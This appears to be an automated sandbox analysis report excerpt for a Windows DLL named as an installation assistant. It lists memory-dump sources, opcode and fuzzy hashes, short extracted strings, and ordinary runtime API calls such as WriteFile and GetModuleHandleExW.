                                          • Instruction Fuzzy Hash: 94B1EE31304B054BD375DE39CA907EAB7E1AF80308F80493DC9AA87B81EFB4A519C795
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a42b4b82a53dfb7125c27c391958f90512e79f572afba738efee2a2e68b245a2
                                          • Instruction ID: e69452ca2dccc3c3d3dc5d360779c607e532c9683d27a9d31a477071da0eeec6
                                          • Opcode Fuzzy Hash: a42b4b82a53dfb7125c27c391958f90512e79f572afba738efee2a2e68b245a2
                                          • Instruction Fuzzy Hash: B7B1AC756047028BC314DF2AC9806ABF7E2FFC8304F54892DD49AC7B12E771A55ACB95
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 57f28dc9a1232a8c06b083a4d088c40ef3b8ca8235aec33933a76f5351274b3b
                                          • Instruction ID: e3bfbffa7cc96a14d378d18317abb8ef3754d89d0837a9616b952dab427cdc4a
                                          • Opcode Fuzzy Hash: 57f28dc9a1232a8c06b083a4d088c40ef3b8ca8235aec33933a76f5351274b3b
                                          • Instruction Fuzzy Hash: E7A1D57160C7418FC325CF2AC5D069ABBE1ABD5318F544E2DE4DAC7B81D631E94ACB42
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b96a3bfa2f071fda60c0812de3eea8bd7f1a293af8749856eb5c89b36b6714e8
                                          • Instruction ID: 1829b15b7dc6f0edad6df5d0685835eee73ad1b9d3603ebf21f40997f116e60d
                                          • Opcode Fuzzy Hash: b96a3bfa2f071fda60c0812de3eea8bd7f1a293af8749856eb5c89b36b6714e8
                                          • Instruction Fuzzy Hash: 1581C335A047058FC320CF2AC180256F7E1FF99714F28CA6DC5999BB55E772E94ACB81
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                                          • Instruction ID: 145365216ea2f93b859c3e88fe885b405c6ab4e5d0b21374983a9f4674e42de7
                                          • Opcode Fuzzy Hash: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                                          • Instruction Fuzzy Hash: C3519C72F006099BDB18CE98DEA26EDBBF2EB88308F248569D511E7781D7749B41CB50
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                                          • Instruction ID: d1a05dd2d2a8ca25ad7a70f134c7c20b80f126839ca24457313beb82bacf77ba
                                          • Opcode Fuzzy Hash: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                                          • Instruction Fuzzy Hash: 683114277A440103CB1CCD3BCD1679F91535BD426AB0ECF396C05DEF56D96CC8124144
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f18cd9d9e139bd055bb212acf8773c3fe54c7ac8df6eb17b1ef3fe2716829738
                                          • Instruction ID: ba7e1ab37d9a745b703ececfdddaba1531a73bd8c72a17b25a4997130bbb3972
                                          • Opcode Fuzzy Hash: f18cd9d9e139bd055bb212acf8773c3fe54c7ac8df6eb17b1ef3fe2716829738
                                          • Instruction Fuzzy Hash: 1D219077320A0647E74C8A38D93737532D0A705318F98A62DEA6BCE2C2D73AC457C385
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8a6ed76600b72a78fc990690e6a7e456086fcb20ecf18423b9384965bdb87ec7
                                          • Instruction ID: 59e383a2c4e72734746665960f6ac0678a9d91241c70ded0d07c2da8b04350b2
                                          • Opcode Fuzzy Hash: 8a6ed76600b72a78fc990690e6a7e456086fcb20ecf18423b9384965bdb87ec7
                                          • Instruction Fuzzy Hash: 63F03072B153249FCB52DA48D60AB8973BCEB45B6AF1100A6E505EB641C7B0DE40C7D1
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                                          • Instruction ID: 9fc5541ea1287d1156c68672181f172f323c7306d962fa06990ad6986fd21197
                                          • Opcode Fuzzy Hash: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                                          • Instruction Fuzzy Hash: AEE08C72A16639FFCB15EB88CA49D8AB3ECEB44B09B1104A6B501E3610D270DF00C7D1
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 152ca77b835acdaa31470eaeb3eb3d3d2907b0f4df8f431f6db191a7075f4f47
                                          • Instruction ID: 9e775abeed684ca77467d17cca6977048c68fff2285a19e0a564aa4dd6adc1c9
                                          • Opcode Fuzzy Hash: 152ca77b835acdaa31470eaeb3eb3d3d2907b0f4df8f431f6db191a7075f4f47
                                          • Instruction Fuzzy Hash: 27C002F6609606AF970CCF1FA480415FBE9FAD8321324C23FA02DC3700C77198258B64
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: @$p&L$p&L$p&L$p&L$p&L$p&L$p&L$p&L
                                          • API String ID: 3519838083-609671
                                          • Opcode ID: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                                          • Instruction ID: 3c8e579d51a74d02a0a27ce886d113152ea444e5fed00965dba1fb6a28bc2f6f
                                          • Opcode Fuzzy Hash: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                                          • Instruction Fuzzy Hash: C0D1A571A0820BDFCB21CFA4DA88AEDB7F5FF45318F144969E455A3E50DB709948CBA0
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: __aulldiv$H_prolog
                                          • String ID: >WJ$x$x
                                          • API String ID: 2300968129-3162267903
                                          • Opcode ID: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                                          • Instruction ID: ad5ab63c4a9d557eafe5c981f7fe0f2d00f1cfe9d920d28647792637c504be89
                                          • Opcode Fuzzy Hash: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                                          • Instruction Fuzzy Hash: 39125C71A00219EFDF20DFA8CE84ADDBBB5FF08318F248969E815A7650D7359985CB50
                                          APIs
                                          • _ValidateLocalCookies.LIBCMT ref: 6C7B9B07
                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 6C7B9B0F
                                          • _ValidateLocalCookies.LIBCMT ref: 6C7B9B98
                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 6C7B9BC3
                                          • _ValidateLocalCookies.LIBCMT ref: 6C7B9C18
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                          • String ID: csm
                                          • API String ID: 1170836740-1018135373
                                          • Opcode ID: 32187db4ca6be7d0da7a5ce7dbf665e9099f5953d1fab8371fb6c2293399f74e
                                          • Instruction ID: dc46b2b63db2d039dc05222679c52a8e9fe37d745c8b626623069411177c8067
                                          • Opcode Fuzzy Hash: 32187db4ca6be7d0da7a5ce7dbf665e9099f5953d1fab8371fb6c2293399f74e
                                          • Instruction Fuzzy Hash: 1941E630A102199FCF00DF68CA88ADF7BB5BF66318F148565E825BB751DB31EA05CB91
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: api-ms-$ext-ms-
                                          • API String ID: 0-537541572
                                          • Opcode ID: dad421a43ef317d285808c9f82830316e7f1bca460a745af1f81a922597331cc
                                          • Instruction ID: b134f17f4e0ef852b6c492079cb69f6a7b6c136bbbdcb59f3f0307d1f5e80d68
                                          • Opcode Fuzzy Hash: dad421a43ef317d285808c9f82830316e7f1bca460a745af1f81a922597331cc
                                          • Instruction Fuzzy Hash: 7321D832F16613AFDB114B69CEC4A3A37A8AF06768F150671F855E7A90D730DF0086E2
                                          APIs
                                          • GetConsoleCP.KERNEL32(?,6C7CB0D0,?), ref: 6C7CBEF9
                                          • __fassign.LIBCMT ref: 6C7CC0D8
                                          • __fassign.LIBCMT ref: 6C7CC0F5
                                          • WriteFile.KERNEL32(?,6C7D5AB6,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C7CC13D
                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6C7CC17D
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C7CC229
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: FileWrite__fassign$ConsoleErrorLast
                                          • String ID:
                                          • API String ID: 4031098158-0
                                          • Opcode ID: 425ef128069e79fb9df1584e2aef5d384a1e5f9cabd7f8542bbbd08ca414c1a1
                                          • Instruction ID: ac0622cb3a1b47724929a9ad9932f75c31dfddaa9fa0c3aa7a6c89549c110650
                                          • Opcode Fuzzy Hash: 425ef128069e79fb9df1584e2aef5d384a1e5f9cabd7f8542bbbd08ca414c1a1
                                          • Instruction Fuzzy Hash: 5ED1AA71E012499FCF11CFE8CA809EDBBB5BF49318F28416AE855BB342D731A946CB51
                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6C682F95
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6C682FAF
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6C682FD0
                                          • __Getctype.LIBCPMT ref: 6C683084
                                          • std::_Facet_Register.LIBCPMT ref: 6C68309C
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6C6830B7
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                          • String ID:
                                          • API String ID: 1102183713-0
                                          • Opcode ID: 1483caf69efece796d61738201a39eb24b021087f0ea15ab9f634f95929e6e3b
                                          • Instruction ID: 8b60a9c300a60ee1dc3e23ce5900b90b80ea2e648681ba95571ee26020294ed0
                                          • Opcode Fuzzy Hash: 1483caf69efece796d61738201a39eb24b021087f0ea15ab9f634f95929e6e3b
                                          • Instruction Fuzzy Hash: 4C418C71E016188FCB14CF84C959B9EB7B4FF89718F054128E855BB740D735AA04CBE8
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: __aulldiv$__aullrem
                                          • String ID:
                                          • API String ID: 2022606265-0
                                          • Opcode ID: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                                          • Instruction ID: 5e3af1c72534beb2fa9b9a2572580236d4d6e4014470bc6cd212e3c4b9482a40
                                          • Opcode Fuzzy Hash: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                                          • Instruction Fuzzy Hash: 5C21B131601219FBDF608EA8DE80DDF7A79FF417A8F20C635B53561A90D2718D51C6A1
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 6C7FA6F1
                                            • Part of subcall function 6C809173: __EH_prolog.LIBCMT ref: 6C809178
                                          • __EH_prolog.LIBCMT ref: 6C7FA8F9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: IJ$WIJ$J
                                          • API String ID: 3519838083-740443243
                                          • Opcode ID: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                                          • Instruction ID: 189bc3161a572eaac820fecb8cb189d7db5d652d3498dce02df4b957bb4a26f7
                                          • Opcode Fuzzy Hash: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                                          • Instruction Fuzzy Hash: 4F71B231900255DFDB14CF64C688FDDBBF4BF18318F1084A9D865A7B91CB74AA0ACB90
                                          APIs
                                          • ___std_exception_destroy.LIBVCRUNTIME ref: 6C682A76
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: ___std_exception_destroy
                                          • String ID: U#hl$q!hl$Jbx$Jbx
                                          • API String ID: 4194217158-1979245787
                                          • Opcode ID: d22c6aa2c8e614f5bb91d2a4e5d30cf459b788236fc26f95cdd82c5f4ccef0a4
                                          • Instruction ID: d50c31976be2d5ce5181e81848f998fbbad707830400a0c0083a6c01daa5ffda
                                          • Opcode Fuzzy Hash: d22c6aa2c8e614f5bb91d2a4e5d30cf459b788236fc26f95cdd82c5f4ccef0a4
                                          • Instruction Fuzzy Hash: E25147B19012048FCB14CF59C8886DEBBB5FF89318F11846EE849AB741D335E985CBA1
                                          APIs
                                          • _free.LIBCMT ref: 6C7D5ADD
                                          • _free.LIBCMT ref: 6C7D5B06
                                          • SetEndOfFile.KERNEL32(00000000,6C7D46EC,00000000,6C7CB0D0,?,?,?,?,?,?,?,6C7D46EC,6C7CB0D0,00000000), ref: 6C7D5B38
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C7D46EC,6C7CB0D0,00000000,?,?,?,?,00000000,?), ref: 6C7D5B54
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFileLast
                                          • String ID: 8Q
                                          • API String ID: 1547350101-4022487301
                                          • Opcode ID: 9c33295caea6510760ccd3d3f3d783aa78cb1d071b4481c5553092774f223c01
                                          • Instruction ID: aca61ad07902dfc56ecd50d8474260950b8092b33ba0d7f331b3c45124873a46
                                          • Opcode Fuzzy Hash: 9c33295caea6510760ccd3d3f3d783aa78cb1d071b4481c5553092774f223c01
                                          • Instruction Fuzzy Hash: 1441C4B6600605ABDB419FA8EF8DB9E3F75EF85368F260151E424E7A90DB30E8044761
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 6C80E41D
                                            • Part of subcall function 6C80EE40: __EH_prolog.LIBCMT ref: 6C80EE45
                                            • Part of subcall function 6C80E8EB: __EH_prolog.LIBCMT ref: 6C80E8F0
                                            • Part of subcall function 6C80E593: __EH_prolog.LIBCMT ref: 6C80E598
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: &qB$0aJ$A0$XqB
                                          • API String ID: 3519838083-1326096578
                                          • Opcode ID: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                                          • Instruction ID: 93804d47adb970e01e367fbb61cb74c155ae9161fe6f5a20581347e7e9867d63
                                          • Opcode Fuzzy Hash: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                                          • Instruction Fuzzy Hash: 50218E72D01258AACF15DBE8DA889DDBBB4AF25318F104469D41177781DB781E0CCB51
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: J$0J$DJ$`J
                                          • API String ID: 3519838083-2453737217
                                          • Opcode ID: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
                                          • Instruction ID: fc5fdcf226918fbe2854ec6e08af8abfcb40badce449bec6ca17858297c5759f
                                          • Opcode Fuzzy Hash: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
                                          • Instruction Fuzzy Hash: 2611D3B1904B64CEC720DF5AC55419AFBE4FFA5708B10C91FC4A697B50C7F8A508CB99
                                          APIs
                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6C7BF1B4,?,?,6C7BF235,?,?,?), ref: 6C7BF13F
                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6C7BF152
